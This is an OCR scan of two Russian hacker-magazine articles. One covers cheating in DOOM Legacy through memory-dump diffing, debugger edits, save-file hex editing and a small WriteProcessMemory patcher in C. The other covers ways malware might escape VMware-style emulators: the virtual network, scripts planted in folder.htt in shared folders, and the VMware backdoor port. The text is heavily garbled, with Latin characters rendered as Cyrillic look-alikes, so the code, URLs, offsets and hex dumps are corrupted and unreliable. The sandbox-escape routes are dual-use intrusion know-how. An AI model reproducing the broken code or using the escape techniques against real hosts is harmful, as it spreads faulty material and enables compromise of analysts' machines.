программы. Да там этих 32И целый миллион! 
До конца сезона все не переберешь! Ключ к 
решению лежит в изменениях! Наблюдая за 
характером изменения различных ячеек, мы 
легко отделим зерна от плевел. План наших 
действий выглядит так: 
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взлом 




Рис. 1 

перевод сырых смещений в виртуальные адреса в (ііеѵѵ'е 




1 . снимаем с программы дамп (сохраняем состояние игры в файле) 

2. двигаемся без потери жизней и патронов, после чего снимаем еще один дамп 

3. делаем один выстрел (теряем несколько процентов жизни) и получаем очередной дамп 

4. повторяем предыдущую операцию несколько раз (3-х дампов обычно достаточно) 



Сравнение первого и 
второго дампов (сэйвов) 
показывает кучу отличий, 
соответствующих пере- 
движениям монстров и 
прочим изменениям игро- 
вого мира. Но ни патронов, 
ни жизней в изменивших- 
ся ячейках не оказывает- 
ся — ведь эти параметры 
заведомо не менялись! 
ОК, вычеркиваем изме- 
нившиеся ячейки из спис- 
ка «подозреваемых» лиц и 
сравниваем второй дам о 
третьим, игнорируя ранее 
изменявшиеся ячейки. 
На этот раз отличий будет 
не так уж и много. Ищем 
ячейки, дельта изменения 
которых соответствует количеству выстрелов 
или потерянных жизней/здоровья. Если таких 
ячеек больше одной, то повторяем операцию 
3 до тех пор, пока не останется только одна 
изменившаяся ячейка или, как вариант, пос- 
ледовательно хачим все подходящие ячейки в 
надежде, что рано или поздно нам повезет. В 
некоторых играх количество патронов хранит- 
ся в нескольких переменных, дублирующих 
друг друга, но только одна из них значима, а 
остальные на хакерском жаргоне называются 
«тенями», отвечающими, например, за вывод 
текущего значения на экран. При модифика- 
ции «теневой» переменной количество патро- 
нов/жизней чаще всего остается неизменным, 
и даже если оно возрастает, оружие переста- 
ет стрелять задолго до исчерпания своего 
боезапаса, а нас все равно убивают. 

Сравнивать можно как дампы памяти, снятые 
с работающей программы, так и сэйвы — 
файлы сохранений. Зная адрес нужной 
ячейки, мы можем повесить резидента, про- 
писывающего сюда максимально возможное 
значение и при необходимости обновляюще- 
го его каждые несколько секунд (или чаще). 
Еще можно запустить зой-іое и, установив 
точку останова, перехватить тот код, который 



Рис. 2 

зоЛ-ісе — отличное средство для 
пополнения запаса патронов 



ХАК В ПАМЯТИ 

Начнем со сравнения дампов памяти. 
Выберем игру и будем над ней изде- 
ваться. Пусть это будет, например, 
ОООМ І_едасу — лучший порт классическо- 
го ОООМ'а, бесплатно распространяемый 
вместе с исходными текстами и замеча- 
тельно работающий как под иЫІІХ, так и 
под ѵѵіп32 (смотри рис. 2). На момент напи- 
сания этих строк последней стабильной 
версий была версия 1.42. Вот прямой линк 
для скачки: ѵѵѵѵѵѵ. оглодал Іоасіз.зоигсеіогае. 
пе1/боотІеаасѵ/Іеаасѵ142.ехе?сІоѵѵпІоасІ . 
Для согласования наших действий рекомен- 
дуется использовать именно эту версию, 
иначе все смещения уползут неизвестно 
куда, но, если ты себя чувствуешь доста- 
точно подготовленным, попробуй потерзать 
более свежие беты, доступные с основной 
страницы проекта. Кроме ОООМ І_едасу, 
нам также потребуются ѵгаб-файлы из ори- 
гинального ОООМ/ОООМ2 или НЕВІТС'а. Ну 
ОООМ-то наверняка у каждого найдется! 
Берем любой приличный дампер, напри- 
мер РЕ Тооіз или БогсІРЕ, находим процесс 
Іедасу.ехе и снимаем с работающей игруш- 
ки ТиІІ битр, обзывая файл, к примеру, 
битр_1.ехе. Условимся считать, что в этот 
момент у нас имеется 50 патронов. 

После создания первого дампа побегай 
немного и задампись еще раз, получив файл 
битр_2.ехе. Затем сделай выстрел и создай 
еще один дамп — битр_3, постреляй еще 
немного и сделай битр_4.ехе. После всех опе- 
раций у тебя под рукой будет четыре файла: 
битр_1.ехе, битр_2.ехе с 50 патронами и 
битр_3.ехе, битр_3.ехе с 49 и 48 патронами, 
соответственно. Теперь мы должны сравнить 
все четыре файла и найти такие ячейки, кото- 
рые совпадают в битр_1.ехе и битр_2.ехе, 
но отличаются у всех остальных. Переменные, 
отвечающие за хранение количества патро- 
нов будут где-то среди них. Для решения этой 
задачи мыщъх написал небольшую утилиту, 
исходный код и готовый бинарник которой 
можно найти на диске. Возьми с диска файл 
Іск.ехе и запусти утилиту: (ск Оитрф.ехе сІитр_ 
2.ехе 0итр_3.ехе 0итр_4.ехе>о 

Полученный результат (перенаправленный в 
файл с именем «о») должен выглядеть при- 
мерно так: 



уменьшает количество патронов с каждым 


гаи оіізеі (і_2 


о 


0_4 


выстрелом — тогда мы сможем его хакнуть. 


000А2РРСИ : РСІ1 


00(1 


6ЕІ1 


Но это потребует дополнительных телодви- 


ОООСРВАОІт: РЕІт 


Р0(1 


РР(1 


жений, что не всегда удобно, поэтому мно- 


00152262М: А1М 


60(1 


00(1 


гие хакеры ограничиваются правкой сэйвов, 


001 523Е2Рі: А1(і 


60(1 


00(1 


выдавая игроку полный боезапас и максимум 


001 66574М: 326 


31(1 


.с 

о 

со 


здоровья, однако подлинное бессмертие в 


001 666В4И: 32(1 


31(1 


30(1 


этом случае уже не достигается — патроны 


001 68Р28М : 32(1 


31(1 


30(1 


и жизни продолжают убывать, и, чтобы не 


001 772А5ІТ: 65І1 


64(1 


РР(1 


умереть, их приходится постоянно пополнять. 


00177538(1: СС(1 


4АІ1 


РР(1 


Кроме того, некоторые монстры убивают 


001 775ЕСМ: С7І1 


26(1 


РР(1 


наповал одной ракетой! 


001 77А1 0(1:08(1 


04(1 


РР(1 
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Рис. 3 

боезапас успешно пополнен! 



Здесь мы получили результат сравнения 
дампов памяти, снятых с программы. Ячейки, 
предположительно содержащие патроны, 
выделены полужирным шрифтом. 

В глаза сразу же бросается стройная цепоч- 
ка 32И, 31 И, ЗОИ, соответствующая следую- 
щим десятичным числам: 50, 49, 48. Ага, это 
же количество патронов! Эта переменная 
встречается в дампе трижды по смещениям 
00166574И, 001666В4И, 00168Р28И. Одна из 
них настоящая, остальные — тени. Как найти 
нужную? Для начала переведем «сырые» 
файловые смещения в виртуальные адреса. 
Проще всего это сделать с помощью Ніеѵѵ. 
Г рузим битреб_1 .ехе, давим <Р5> (доіо), вво- 
дим «сырое» смещение 166574 и нажимаем 
<еп(ег> — Ніеѵѵ тут же показывает в верхней 
строке соответствующий виртуальный адрес 
(РЕ. 00568574), а значение байта под курсо- 
ром равно 32И, значит, все правильно! 

БЕРЕМСЯ ЗА ОТЛАДЧИК 

Загружаем зой-ісе (подопытная игрушка при 
этом уже должна быть запущена), нажимаем 
<СігІ-0> и говорим «аббг Іедасу», застав- 
ляя отладчик переключиться на контекст 
нужного процесса (в данном случае Іедасу. 
ехе — главный исполняемый файл игрушки). 
Вводим «ѵѵб», чтобы появилось окно дампа и 
пишем «д 568574», где 568574 — виртуаль- 
ный адрес предполагаемой ячейки памяти 
с патронами. Отладчик показывает в дампе 
содержимое памяти. Команда «е» позволяет 
его редактировать в интерактивном режиме. 
Как вариант, можно написать «е 568574 66», 
где 66 — количество патронов в шестнадцате- 
ричном исчислении. Захачив предполагаемую 
ячейку с патронами, выходим из отладчика 
по <С1г1-0> и смотрим, добавили нам патро- 
нов или нет (в некоторых играх изменения 
отображаются только после следующего 
выстрела). Ни хрена! Патроны продолжают 
убывать, а враги напирают, и долго мы так 
не продержимся! Сурово! Пробуем вторую 
ячейку — 1666В4И, лежащую, как утвержда- 
ет Иіеѵѵ, по виртуальному адресу 5686В4Ь, но 
количество патронов по-прежнему остается 
неизменным. А вот на третий раз нам действи- 
тельно везет, и патроны послушно увеличи- 
ваются до нужного значения. Следовательно, 
искомая переменная — это 168Р285 с вирту- 
альным адресом 56АР286. В любой момент 
мы можем вызвать отладчик, набрать «аббг I 
едасу <еп(ег> е 56АР28 РР», пополняя запас 
патронов до максимального значения, вот 
только постоянно лазить в зоіі-ісе слишком 
напряжно, да и не у всех он есть. Мы посту- 
пим проще: напишем программу, которая 
будет висеть в бэкграунде и подкидывать нам 
новые патроны каждые несколько секунд, 
даже несколько раз в секунду. Вот это дейс- 
твительно «подарок свыше»! :) Программа 
очень проста, ее код легко укладывается в 
пару строк — в этом легко убедиться, посмот- 
рев на соответствующую врезку. Программа 
принимает идентификатор процесса (РЮ) в 



качестве аргумента командной строки, кото- 
рый можно определить с помощью виндово- 
го «Диспетчера задач». После завершения 
игрушки, наш автопатчер завершается авто- 
матически. Он также может быть применен 
для хака других игрушек — необходимо лишь 
скорректировать АММО_АООВ на адрес нуж- 
ной ячейки, АММО_ѴАШЕ — на желаемое 
значение, а АММО_$І2Е — на размер пере- 
менной. Запускаем нашу утилиту и оттягиваем 
монстров по полной, то есть не по-детски. При 
быстрой стрельбе патроны слегка убывают, 
но тут же вновь восстанавливаются в исход- 
ное значение. Красота! 

ХАК НА ДИСКЕ 

Модификация игр в памяти — мощная штука, 
но все-таки несвободная от ограничений. 
Программы, защищенные различными про- 
текторами (типа зіаг-іогсе), активно сопротив- 
ляются снятию дампа, а под І_іпих нормальных 
дамперов вообще нет! В этих (и многих других) 
случаях приходится прибегать к альтернатив- 
ному методу — правке файлов состояния игры 
(сэйвов). Тактическая стратегия выглядит как 
обычно: сохраняемся в заѵесМ , перемещаемся 
без потери здоровья (патронов) и сохраняем- 
ся в заѵеб_2, затем стреляем один раз (тратим 
несколько процентов здоровья) и сохраняем- 
ся в заѵеб_3. Сравниваем полученные файлы 
с нашей утилитой Іск.ехе и смотрим различия. 
Выбрав наиболее вероятных «кандидатов», 
правим их в Ьех-редакторе, загружаем исправ- 
ленный файл в игру и, если патроны/здоровье 
не изменились, правим следующий байт и т.д. 
Вернемся к ЭООМ'у. Подготавливаем три сэйва 
(боотзаѵО.бзд, боотзаѵі.бзд и боотзаѵ2.бзд) 
и сравниваем их друг с другом. Опс! Все они 
имеют разный размер: 2440, 2586 и 2650 байт. 
Плохо дело! Судя по всему, сэйв имеет слож- 
ную структуру, и простое побайтовое сравне- 
ние, скорее всего, ничего не даст, поскольку 
ячейки, отвечающие за хранение патронов 
(здоровье), окажутся расположенными по раз- 
личным смещениям. Расшифровка структуры 
сэйв-файлов — сложное, но очень увлекатель- 
ное дело, «заразившее» множество светлых 
умов. Основным оружием становится интуиция 
и нечеткий «скользящий» поиск — мы ищем 
совпадающие (или просто похожие) фрагменты 
и корректируем смещения с привязкой к ним. 
В частности, боотзаѵХ.бзд имеет следующую 
структуру: сначала идет заголовок, содержащий 
имя сэйва, версию игры и прочую лабуду. 

ЗАГОЛОВОК СЭЙВА 

0000000000: 32 00 Р4 77 00 00 00 00 ? 00 00 00 00 
00 00 00 00 2 1 » 

000000001 0: 2В 7Е 9С Р7 00 00 00 00 ? 76 65 72 73 69 
6Р 6Е 20 +~Ьу ѵегзіоп 

0000000020: 31 34 32 00 00 00 00 00 ? 61 66 33 32 00 
52 37 59 142 а(32 В7У 

0000000030: 65 73 00 ВЗ 19 31 00 8Р ? 29 32 30 00 А8 
43 4Р66 ѳ$??1 П)20 иСШ 

0000000040: 66 00 ВЕ 9Р 4Е 6Р 00 6Е ? 77 59 65 73 00 
С8 37 4Е 1 ?ЯІ\Іо пм/Уез ?7І\І 
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Рис. 4 

синхронизация «рожиц» в ЕАВ'е 



За заголовком расположен какой-то бессис- 
темный блок, всегда начинающийся со сме- 
щения 1006: 

00000001 00: 31 34 35 37 36 33 32 33 ? Об 00 С8 00 02 
00 64 00 14576328? ??0 

0000000110:00 00 90 01 28 00 90 01 ? 02 00 28 00 00 
00 2С01 Р?( Р?? ( ,? 

00000001 20: 64 00 00 00 07 00 00 00 ? 03 00 00 00 00 
6С 05 01 О-???? 

0000000130: 00 00 00 04 03 01 00 4С ? 00 20 00 00 
00 00 00 00 ??? I 

К бессистемному блоку примыкает характер- 
ная структура с косыми потоками рожиц. Ее 
смещение и размер различны и варьируются 
в очень широких пределах. Мы еще не знаем, 
за что она отвечает, но что бы здесь ни распо- 
лагалось, вести сравнение нужно не с начала 
файла, а с начала этой самой структуры: 

0000000140: РР 00 00 01 01 01 01 00 ? 01 01 01 08 00 
01 1 С 01 ???? ???? ??? 

0000000150: 0А 00 01 01 01 0В 00 01 ? 01 01 ОС 00 01 
01 01 10 ? ???? ???? ???? 

00000001 60: 00 01 01 01 1 1 00 01 01 ? 01 1 2 00 01 01 
01 13 00 ???? ???? ???? 

0000000170: 01 01 01 14 00 01 01 01 ? 15 00 01 4С 01 
16 00 01 ???Ц ???§?[_??? 




Рис. 5 

быстро переключаясь между файлами по 
<+>/<->, ищем изменившиеся ячейки 



Что значат косые потоки рожиц (знаков «?»)? 
И как определить это самое начало? Очень 
просто! Точно так, как астрономы опреде- 
ляют переменные и вспыхивающие звезды! 
Звездное небо не остается постоянным, и 
излучения некоторых звезд изменяют свои 
свойства со временем. Но как найти их среди 
тысяч других? Очень просто. Проецируем 
один звездный снимок на стену, затем уда- 
ляем его из проектора и вставляем другой, 
снятый чуть позже, добиваясь, чтобы звез- 
ды располагались на тех же самых местах, а 
теперь быстро-быстро меняем снимки один 
за другим. Переменные звезды начинают 
характерно мерцать! Используем эту технику 
для поиска отличающихся байт! Нам потребу- 
ется только ЕАП, все по-мужски :). 

Подгоняем курсор к боотзаѵО.бзд и давим 
<РЗ> (ѵіеѵѵ), а затем — <Р4> (бех-тобе). 
Нажимаем <+> для перехода к следующему 
файлу (боотзаѵі .бзд), а затем — <-> для 
возвращения к предыдущему. Повторяем 
эму операцию несколько раз, убеждаясь, 
что косые потоки рожиц смещаются на зна- 
чительные расстояния, поскольку начина- 
ются с разных смещений. Нажимая <АІ1-8> 
(доіо), изменяем стартовое смещение файла 
боотзаѵі.бзд так, чтобы рожицы перестали 
прыгать. Словно мы крутим «синхрониза- 
цию» на осциллографе или накладываем 
отпечатки пальцев друг на друга, добиваясь 
наибольшего совпадения. В моем случае 
разница в базовом смещении рожиц соста- 
вила 7 байт. То есть, чтобы они синхронизо- 
вались, один файл необходимо просматри- 



вать, начиная со смещения Е06, другой — с 
Е76. ОК! Рожицы совпадают, и никаких раз- 
личий между ними не обнаруживается! За 
что же они отвечают? Возвращаемся в игру 
и, не сходя со своего места, убиваем одно- 
го монстра. Сохраняемся. Ага! Различий по- 
прежнему нет. Значит, «рожицы» отвечают 
не за трупы. Обращаем внимание, что по 
мере прохождения игры рожиц становится 
все больше и больше. Так, может быть, это и 
есть картографирование? Проверяем свою 
гипотезу. Действительно, стоит нам войти 
в новый сектор, как сразу же добавляется 
новая порция рожиц. Интересно, хранят ли 
они только карту или еще и состояния две- 
рей? Это легко выяснить эксперименталь- 
но! За рожицами начинается совсем другая 
структура данных, в которой на первый 
взгляд нет никакой закономерности и кото- 
рая чудовищно изменяется между двумя 
соседними сохранениями. Логично пред- 
положить, что здесь сосредоточена свя- 
тая святых — описание объектов игрового 
мира. Но как во всем этом разобраться? 

ФРАГМЕНТ СТРУКТУРЫ, ОПИСЫВАЮЩЕЙ 
СОСТОЯНИЕ ИГРОВОГО МИРА 

0000000740: 00 50 05 00 00 30 ОЕ 40 ? РР РР ВР 
01 00 00 00 00 Р? 0?@ ?? 

0000000750: 03 26 00 00 68 2Е Р1 00 ? 00 00 08 
00 00 00 08 00 ?& б.е ? ? 

0000000760: 09 00 00 00 30 07 00 00 ? 30 ОЕ 40 
РР РР ВР 38 03 ? О» 0?@ ?8? 

0000000770: 04 00 00 00 01 00 00 00 ? 00 03 20 
00 00 34 2Р Р1 ? ? ? 4/е 

0000000780: 00 00 00 08 00 00 00 08 ? 00 0А 00 
00 00 ЕО 06 00 ? ? ? р? 

0000000790: 00 50 СЮ 40 РР РР ВР 01 ? 00 00 
00 00 03 24 04 00 Р?@ ?? ?$? 

00000007АО: 00 30 Р1 00 00 00 70 00 ? 00 00 70 
00 ОВ 00 00 00 0е р р ? 

При внимательном осмотре дампа мы 
обнаружим, что константа РЕЕЕ6 встреча- 
ется намного чаще, чем остальные. Это 
ключ к понимаю структуры файла, но... 
где тот замок, куда его вставить? Смотрим. 
Константы расположены на различном рас- 
стоянии друг от друга, значит, мы имеем 
дело со структурой переменного размера 
или со списком, завершаемым «терминиру- 
ющим» символом ЕЕРЕ6. Если это структу- 
ра, то где-то должен храниться ее размер, 
выражаемый в байтах, словах или двойных 
словах. Как найти его в дампе? Возьмем 
две ближайших константы, расположенные 
по смещению (7486 и 76В6). Как нетруд- 
но подсчитать, их разделяет 236 байта. 
Следовательно, размер структуры не может 
выражаться ни словами, ни двойными сло- 
вами (236 не кратно двум), а только байтам. 
Ищем число 236 в окрестности наших конс- 
тант. Его нет! Поэтому можно предположить, 
что ЕРЕЕб используется в качестве термини- 
рующего символа, то есть служит знаком 
конца списка. Остается только написать 
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Рис. 6 

с такой броней и здоровьем никакие враги не 
страшны! 



программу, отображающую содержимое 
списков в удобочитаемом виде, тогда искать 
различия будет намного проще. Однако это 
довольно сложная задача, решение кото- 
рой требует уймы времени и терпения. Зато 
потом мы сможем «убивать» любых монстров 
или добавлять новых, подкладывать аптечки 
и другие артефакты, словом, творить чуде- 
са, но это будет потом. Сейчас же мы огра- 
ничимся тем, что пополним запас патронов, 
здоровья и брони, а также дадим герою все 
оружие, из которого лично я предпочитаю 
совсем не ВРО, а обыкновенный дробовик, 
причем одностволку! :) Вместо сравнения 
сэйвов, мы используем альтернативный 
подход, называемый «прямым константным 
поиском». Допустим, у нас сложилась сле- 
дующая ситуация: здоровье — 68%, броня — 
95%, патроны — 73 (200 тах), патроны для 
дробовика — 24 (50 тах). Переводим 68 и 
95 в шестнадцатеричную систему исчисле- 
ния и получаем 44Ь и 5РИ. Отгружаем игру 
в сіоотзаѵ.бзд и загружаем этот файл в 
Ьіеѵѵ. Давим <Р7> (зеагсЬ) и ищем 44И, где 
оно есть (внимание! При поиске чисел > 
255 необходимо помнить, что младший байт 
располагается по меньшему адресу и поэто- 
му ищется в обратном порядке, то есть для 
поиска 1234И в Ьіеѵѵ'е необходимо ввести 
34 12). Ячейка с искомым значением тут же 
обнаруживается по смещению В4И. Может, 
это и не здоровье, но... рядом с ней лежит 
5РЬ, а это, как мы помним, наша броня: 



ФРАГМЕНТ СЭЙВ-ФАЙЛА С ЯЧЕЙКАМИ, ХРАНЯЩИМИ 
ЗДОРОВЬЕ И БРОНЮ 

000000В0: 00 00 00 00-44 00 5Р 00-01 00 01 0А-00 00 00 00 

О _ ? ?? 

000000С0: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00 
ОООООСЮО: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00 
000000 Е0 : 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00 
000000Р0: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 30 о 



Исправляем оба числа на РРРРІт и загружаем 
исправленный сэйв в игру. Нетрудно заме- 
тить, что у нас все получилось :). 

ЗАКЛЮЧЕНИЕ 

Приобретенные навыки оказываются очень 
полезными при расшифровке сетевых про- 
токолов и реконструкции недокументирован- 
ных форматов файлов и файловых систем. 
Квалифицированных специалистов мало, 
поэтому на них всегда присутствует устойчи- 
вый спрос, так что бессмертие в играх — это 
совсем не забава! Это очень и очень серь- 
езно! Многие выдающиеся хакеры начинали 
именно с бессмертия. Осваивали Иех-редак- 
тор, терзали отладчик, понемногу изучали 
ассемблер и постепенно двигались к тому, 
кем они стали сейчас. В общем, ты меня 
понял. Вливайся! 

віндяѵ ѵоик в тс 




В полной версии статьи тебя ждет крутой 
бонус: там Крис покажет тебе, как перехва- 
тывать код, который всячески «вредит» тебе, 
уменьшая количество жизней, патронов и так 
далее. В этом случае все время обновлять 
ячейки памяти с патронами и жизнями не 
нужно: эти значения просто не будут меняться 




#гіейпе АММО_АББК 0х56АЕ28 

#с1еБпе АММО_ѴАІДІЕ 66 

#с1ейпе АММО_8І2Е 1 

таіп(іш; с, сЬаг** ѵ) 

{ 

// объявляем переменные и прове- 
ряем аргументы командной строки 

ІШ: х; НАЫБЬЕ Ь; ипзі^песі ім 
ашшо = АММО_ѴАШЕ; іГ (с < 2) геШгп -1; 

// открываем процесс 
іГ (!(Ь=ОрепРгосе88(РКОСЕ55_ 
ѴЛЦУКІТЕ I РКОСЕ55_ѴМ_ОРЕКАТІСЖ 
,0,аю1(ѵ[1])))) 

гешгп ргіпгГ( " -егпореп 
ргосе88 %сІ\п",аі:о1(ѵ[1])); 

// несколько раз в секунду попол- 
няем запас патронов 

// 669 — задержка между обнов- 
лениями в миллисекундах 

\ѵЬі1е (\ѴгігеРгосе88Мешогу(Ь, 
АММО_АВЭК, &атшо, АММО_5І2Е, 
&х))51еер(669); 

} 
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МНОГИЕ ХАКЕРЫ И СИСТЕМНЫЕ АДМИНИСТРАТОРЫ ГОНЯЮТ СОМНИТЕЛЬ- 
НЫЕ ПРОГРАММЫ ПОД ѴМ ѴѴАРЕ И ПРОЧИМИ ЭМУЛЯТОРАМИ, СЧИТАЯ, 

ЧТО ОНИ НАДЕЖНО ЗАЩИЩЕНЫ, ОДНАКО ЭТО НЕ ТАК! ЗЛОВРЕДНЫЙ КОД 
МОЖЕТ ВЫРВАТЬСЯ ИЗ ЭМУЛЯТОРА И ПОКОЦАТЬ ОСНОВНУЮ СИСТЕМУ. 
КРИС КАСПЕРСКИ ДЕТАЛЬНО ИССЛЕДОВАЛ ЭТОТ ВОПРОС И ПРЕДЛАГАЕТ 
НЕСКОЛЬКО ЭФФЕКТИВНЫХ СЦЕНАРИЕВ ВОЗМОЖНЫХ АТАК. 



ТАК ДЕЛАЛ ТВОЙ ДЕДУШКА 

Во времена МЗ-ЭОЗ/Эх для экспериментов с вирусами прихо- 
дилось держать на столе несколько компьютеров или переклю- 
чаться на специальный жесткий диск, что было крайне неудоб- 
но. Народ с тоскою поглядывал в сторону ИТ, гибкая система 
безопасности которой позволяла творить чудеса, например, 
разрешала процессу изменять только специально подсаженные 
файлы-дрозофилы. Увы! Большинство вирусов не работало под 
1МТ! К тому же подсистема защиты оказалась крайне ненадежной, 
и хакеры научились ее обходить (например, эмулировать ввод с 
мыши/клавиатуры, посылая команды более привилегированному 
окну). С появлением виртуальных машин (ѴМ Маге, Ѵігіиаі РС) 
появился и соблазн использовать их как «загон» для вирусов и 
червей, что очень удобно. Вместо возни с мониторами, корпу- 
сами, жесткими дисками и проводами десяток «системных бло- 
ков» свободно размещается в нашей хакерской норе, к тому же 
некоторые эмуляторы, например ВОСНЗ, содержат встроенные 
отладчики, уверенно работающие там, где зоН-ісе и оііу уже не 
справляются. 



МОЙ ДОМ — ТЮРЬМА 

Весь вопрос в том, насколько это надежно. Гонять живого червя 
на эмуляторе? А вдруг он вырвется за его пределы? Анализ чер- 
вей, выловленных в дикой природе, показывает, что многие из них 
уверенно распознают наличие эмулятора, отказываясь на нем 
запускаться, в результате чего червь имеет хорошие шансы прой- 
ти незамеченным. Но хакерская мысль не стоит на месте, пыта- 
ясь вырваться из-за стенок виртуальной машины. Теоретически 
это вполне возможно. Эмуляторы (особенно динамические, то 
есть такие, которые часть команд выполняют на «живом» про- 
цессоре) не свободны от ошибок. Привилегированные команды 
(типа обращения к портам ввода/вывода) отлавливаются эмуля- 
торами достаточно надежно, и никаких граблей здесь по обык- 
новению нет, но существует реальная угроза записи в адресное 
пространство процесса-эмулятора при выполнении «обычных» 
инструкций. Конечно, модификации подвергается не код, а дан- 
ные, но, если среди этих данных окажется хотя бы один указатель 
(а он наверняка там окажется), нашу хакерскую задачу можно 
считать решенной. Единственная проблема в том, что такая дыра 
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(даже если она действительно будет обнару- 
жена) успеет заткнуться быстрее, прежде чем 
получит большое распространение, к тому 
же существующие эмуляторы значительно 
уменьшают шансы червя на успех. Отбросим 
гипотетические дыры и сосредоточимся на 
универсальных методиках, работающих прак- 
тически под любым эмулятором и эксплуати- 
рующих уязвимости концептуального уровня, 
которые не так-то просто закрыть. Мыщъх 
предлагает три сценария атаки: а) проникно- 
вение через виртуальную сеть, б) Ьаск боог- 
интерфейс эмулятора и в) внедрение в (оібег. 
6(1 в збагеб (оібегз. Рассмотрим эти механиз- 
мы поподробнее. 

ВИРТУАЛЬНАЯ СЕТЬ 

Практически все эмуляторы поддерживают 
виртуальную сеть, связывающую гостевую 



Учитывай, что информация в статье — не 
призыв к действию. Не принимай близко 
к сердцу написанное и не забывай, что за 
подобные действия можно попасть в суд. 



(диезі) и основную (бозі) системы невидимым 
кабелем. В эмуляторах типа ОЕМІІ она под- 
нимается сразу, в ѴМ ѴѴаге — только после 
соответствующей настройки виртуальной 
машины, но обычно эмулятор конфигури- 
руется с сетью, потому что это самый удоб- 
ный способ обмена данными. К тому же на 
базе той же ѴМ ѴѴаге можно легко построить 
бопеуроі, своеобразный «капкан» для виру- 
сов и червей, заползающих из Интернета. 
Если основная операционная система доступ- 
на по сети и в ней имеются дыры (типа дыр в 
ЭСОМ ВРС или ТСРІР.ЗУЗ), то ее можно сво- 
бодно атаковать из-под эмулятора так же, как 
и по настоящей сети. Разница лишь в том, что 
большинство персональных брандмауэров не 
отслеживают локальные подключения и не 
препятствуют им, то есть эмулятор позволяет 
хакеру подключаться к тем ресурсам, доступ 
к которым извне компьютера надежно закрыт! 
При организации бопеуроі'ов это очень акту- 
ально! Допустим, основная система содержит 
збагеб-ресурсы, доступные только изнутри 
локальной сети и для удобства не имеющие 
паролей, тогда виртуальная машина становит- 
ся своеобразным «мостом» (или, если угод- 
но, ргоху-сервером) между хакером/червем и 
основной системой! Как защититься от этой 
атаки? Самое простое — снести виртуальную 
сеть, а весь обмен данными с гостевой систе- 
мой ввести через дискету/СЭ-НОМ. Чтобы не 
возиться с прожиганием СО-В/ВѴѴ-болванок, 
можно использовать виртуальные ізо-образы, 
только это все равно не спасет! Значит, нужно 
своевременно устанавить свежие заплатки 
на основную систему, а также пароли на все 
збагеб-ресурсы и удалить с основной машины 
все службы, доступ к которым нежелателен, 
либо же убедиться, что персональный бран- 
дмауэр отслеживает локальные подключения 
и блокирует их. 

ОБЩИЕ ПАПКИ 

Эмулятор ѴМ ѴѴаге предоставляет еще один 
способ обмена данных между виртуальной 
машиной и основной операционной сис- 
темой — збагеб (оібегз (общие папки). При 
настройке гостевой машины администратор 
открывает доступ к одному или нескольким 



каталогам основной системы, и виртуальная 
машина «видит» их в своем сетевом окруже- 
нии. Механизм общих папок работает в обход 
виртуальной сети, которая, может быть, вооб- 
ще не установлена, и в плане защиты очень 
надежен, однако атаковать его все-таки 
можно! Как известно, начиная с ѴѴІпбоѵѵз 
98, «проводник» поддерживает пользова- 
тельский стиль папок, управляемый файлом 
(оібег.бй. Это обыкновенный бНр-шаблон, 
«переваривающий» не только тэги, но и 
скрипты. Известно множество ѴВЗ-вирусов, 
размножающихся именно этим путем. Что 
произойдет, если зловредный код, исполняю- 
щийся под эмулятором, создаст собственный 
(оібег. бй-файл или внедрится в уже существу- 
ющий? При первом же открытии общей папки 
Проводником основной системы скрипт, 
содержащейся в (оібег.бй, получит управле- 
ние, запуская вируса в свои владения! И это 
не единственный путь! Вирус может создать 
безкіор.іпі, указав, что папка использует- 
ся для хранения изображений, тогда при ее 
открытии Проводник автоматически отобра- 
жает миниатюры. Известно по меньшей мере 
три фатальные ошибки ѴѴІпбоѵѵз, приводя- 
щие к возможности передачи управления на 
машинный код, — в Ьтр-, ітр- и ѵѵтбфайлах. 
И хотя соответствующие заплатки были выпу- 
щены очень давно, множество машин оста- 
ются уязвимыми и по сей день. Защититься 
от атак данного типа очень просто: забей на 
Проводник и пользуйся только РАВ'ом или 
Тоіаі Соттапбег'ом, периодически проверяя 
общие папки на вшивость (даже если лично 
ты никогда не пользуешься Проводником, то 
это еще не означает, что им не пользуются 
остальные, и существует вероятность, что 
общую папку откроет кто-то другой). 

ВАСКБООН 

Для управления виртуальной машиной мно- 
гие эмуляторы используют специальный (и 
по обыкновению недокументированный) Ьаск 
боог-механизм вроде того, что есть в зой-ісе 
(см. ІІМТ 036 в Іпіеггирі Йізі'е Ральфа Брауна). 
ѴібиаІ РС использует для той же цели инва- 
лидные инструкции процессора, например 
ОРб ЗРб 076 ОВб, а ѴМ ѴѴаге — «магический» 
порт ввода/вывода. Остановимся на ѴМ ѴѴаге 
как на самом популярном эмуляторе. Чтобы 
передать Ьаск боог-команду на выполнение, 
необходимо выполнить следующие действия: 

• в регистр ЕАХ занести магическое число 
564Э58686 ('ѴМХб' в АЗСІІ-представлении); 

• в регистр ЭХ занести магическое число 
56586 (номер порта, 'ѴХ' в АЗСІІ); 

• в регистр СХ занести номер команды, а в 
регистр ЕВХ — ее параметры; 

• выполнить команду ІІ\І ЕАХ, ЭХ (ог ОІІТ ОХ, 
ЕАХ); 

• если программа исполняется не под ѴМ ѴѴаге 
(или ѴМ ѴѴаге был предварительно пропатчен) 
на прикладном уровне защищенного режи- 
ма возникнет исключение типа «нарушение 
доступа»; 
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• при выполнении под ѴМ ѴѴаге регистр ЕВХ 
будет содержать магическое число 564Э5868ІП 
('ѴМХИ' в АЗСІІ-представлении), а в остальных 
регистрах — возвращенные данные (если 
они есть); 

ѴМ ѴѴаге поддерживает большое количество 
самых различных команд, подробно исследо- 
ванных Кеп'ом Каіо и описанных в его статье 
ѴМѵгаге'з баск ( ИНоѴ/сІ'ііІсІіаІ.аІ.іпІозеек.со.Ір/ 
ѵгтил/аге/ЬасксІоог.ЫггіІ ). Здесь можно найти и 
установку даты/времени, и работу с буфером 
обмена, и даже механизм удаленного вызо- 
ва процедур (ВРС), но потенциально опас- 
ных команд среди них нет. Вирус не может 
просто взять и вырваться из виртуальной 
машины! Или... все-таки может? Свыше двух 
десятков команд еще остаются неисследо- 
ванными. Никто не знает, какие возможности 
нас ждут... Из всех команд, исследованных 
на сегодняшний день, самой опасной была и 
остается ОСИ (Соппесі/сіівсоппесі а деѵісе), 
отвечающая за подключение/отключение ЮЕ-, 
ЗСЗІ- и ІІЗВ-устройств. У вируса существует 
шикарная возможность подключить физи- 
ческий диск основной системы и нагадить на 
него по полной программе (ѴМ ѴѴаге позво- 
ляет создавать виртуальные диски на основе 
